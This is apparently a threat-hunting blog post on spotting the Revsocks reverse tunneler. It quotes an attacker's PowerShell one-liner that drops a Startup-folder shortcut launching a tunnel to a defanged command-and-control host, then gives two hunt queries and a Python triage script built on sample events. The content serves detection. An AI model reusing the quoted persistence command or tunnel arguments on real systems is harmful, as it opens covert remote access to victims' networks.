178. Hunting for Another Tunneler: Revsocks
Hello everyone!
Tunnelers are everywhere! And this one is becoming more and more popular among threat actors: Revsocks. Let's look at how this tool is abused in the wild.
Here's an example. The adversary abused PowerShell to create a shortcut in the Startup folder, so that revsocks is executed at every logon:
powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();"
So, the first hunting idea is to search for shortcut creation via PowerShell:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: "createshortcut"
Another one is hunting for revsocks-related command line arguments. The sample above uses -connect, -tls, -pass and -ws; searching for "connect" and "pass" together is a broad substring match, so expect some benign hits to triage:
event_type: "processcreatewin"
AND
cmdline: ("connect" AND "pass")
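Both hunts, run over a handful of constructed process-creation events, as an added Python example that is not from the original post. It implements the two searches as written (case-insensitive substring matching on the same field names), then adds two refinements an analyst would want: it pulls the .lnk path, target and arguments out of the CreateShortcut one-liner, and it checks that -connect and -pass appear as actual switches rather than as substrings, which is what separates the revsocks command line from something like "connect_timeout=5 password=x". The sample events, the severity labels and the function names are assumptions made for this example.

```python
import re
from typing import Dict, List, Optional

Event = Dict[str, str]

# Constructed sample telemetry (not from the original post), using the same
# field names as the post's searches. Event 0 mirrors the post's revsocks
# shortcut with defanged indicators; the others are benign noise chosen to
# show what each hunt catches and what it misses.
SAMPLE_EVENTS: List[Event] = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": ("powershell -Command \"$s = (New-Object -COM WScript.Shell)"
                 ".CreateShortcut('C:\\Users\\user\\AppData\\Roaming\\Microsoft"
                 "\\Windows\\Start Menu\\Programs\\Startup\\m4.lnk'); "
                 "$s.TargetPath = 'C:\\Users\\user\\AppData\\Local\\Microsoft"
                 "\\Windows\\m4.exe'; $s.Arguments = '-connect "
                 "hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; "
                 "$s.WorkingDirectory = 'C:\\Users\\user\\AppData"
                 "\\Local\\Microsoft\\Windows'; $s.Save();\"")},
    # the tunneler itself, as it would run at the next logon
    {"event_type": "processcreatewin", "proc_file_name": "m4.exe",
     "cmdline": "m4.exe -connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws"},
    # benign PowerShell
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
    # benign, yet contains both "connect" and "pass" as substrings
    {"event_type": "processcreatewin", "proc_file_name": "psql.exe",
     "cmdline": "psql.exe \"host=db01 connect_timeout=5 password=s3cret\""},
    # shortcut created by an IT script: outside Startup, no arguments
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": ("powershell -Command \"$s=(New-Object -COM WScript.Shell)"
                 ".CreateShortcut('C:\\Users\\Public\\Desktop\\Portal.lnk'); "
                 "$s.TargetPath='C:\\Program Files\\Portal\\portal.exe'; $s.Save()\"")},
    # right command line, wrong event type: both hunts must ignore it
    {"event_type": "filecreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -Command CreateShortcut"},
]


def _proc_create(e: Event) -> bool:
    return e.get("event_type", "").lower() == "processcreatewin"


def hunt_powershell_shortcut(events: List[Event]) -> List[Event]:
    """Hunt 1 from the post: powershell.exe process creations whose command
    line contains 'createshortcut' (case-insensitive substring match)."""
    return [e for e in events
            if _proc_create(e)
            and e.get("proc_file_name", "").lower() == "powershell.exe"
            and "createshortcut" in e.get("cmdline", "").lower()]


def hunt_connect_pass(events: List[Event]) -> List[Event]:
    """Hunt 2 from the post: any process creation with both 'connect' and
    'pass' somewhere in the command line. Broad by design, hence noisy."""
    return [e for e in events
            if _proc_create(e)
            and all(tok in e.get("cmdline", "").lower() for tok in ("connect", "pass"))]


# Parsing of the WScript.Shell one-liner. Assumes single-quoted string
# literals, as in the post's sample.
_LNK = re.compile(r"CreateShortcut\(\s*'(?P<lnk>[^']*\.lnk)'\s*\)", re.I)
_PROP = re.compile(r"\.(?P<name>TargetPath|Arguments|WorkingDirectory)\s*=\s*'(?P<val>[^']*)'", re.I)


def parse_shortcut(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the .lnk path and the properties set on it (keys in lower case),
    or None when the command line contains no CreateShortcut call."""
    m = _LNK.search(cmdline)
    if not m:
        return None
    info = {"lnk": m.group("lnk")}
    for p in _PROP.finditer(cmdline):
        info[p.group("name").lower()] = p.group("val")
    return info


# Switches seen in the post's sample. Matching them as whole tokens (leading
# hyphen, word boundary after) is the refinement over plain substring search.
_SWITCH = re.compile(r"(?<![\w-])--?(connect|pass|tls|ws)\b", re.I)


def revsocks_style_switches(cmdline: str) -> List[str]:
    """Sorted list of the sample's switches present as real switches."""
    return sorted({m.group(1).lower() for m in _SWITCH.finditer(cmdline)})


def is_revsocks_like(cmdline: str) -> bool:
    """Tighter form of hunt 2: -connect and -pass must both be switches."""
    sw = revsocks_style_switches(cmdline)
    return "connect" in sw and "pass" in sw


def triage(events: List[Event]) -> List[Dict[str, str]]:
    """Run both hunts and grade the hits: a shortcut dropped into Startup whose
    arguments look like revsocks, or a process launched with those switches,
    is 'high'; every other hit is 'low' and left for manual review."""
    findings = []
    for e in hunt_powershell_shortcut(events):
        info = parse_shortcut(e["cmdline"]) or {}
        in_startup = "\\start menu\\programs\\startup\\" in info.get("lnk", "").lower()
        args = info.get("arguments", "")
        findings.append({"rule": "powershell_createshortcut",
                         "lnk": info.get("lnk", ""),
                         "target": info.get("targetpath", ""),
                         "severity": "high" if in_startup and is_revsocks_like(args) else "low"})
    for e in hunt_connect_pass(events):
        findings.append({"rule": "cmdline_connect_and_pass",
                         "target": e.get("proc_file_name", ""),
                         "severity": "high" if is_revsocks_like(e["cmdline"]) else "low"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

Running it against the sample set, hunt 1 returns both shortcut creations and hunt 2 returns the revsocks shortcut, the tunneler's own launch and the psql command line; only the first three are graded high. The same event can show up under both rules, which is useful when one of them is later tuned down.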
See you tomorrow!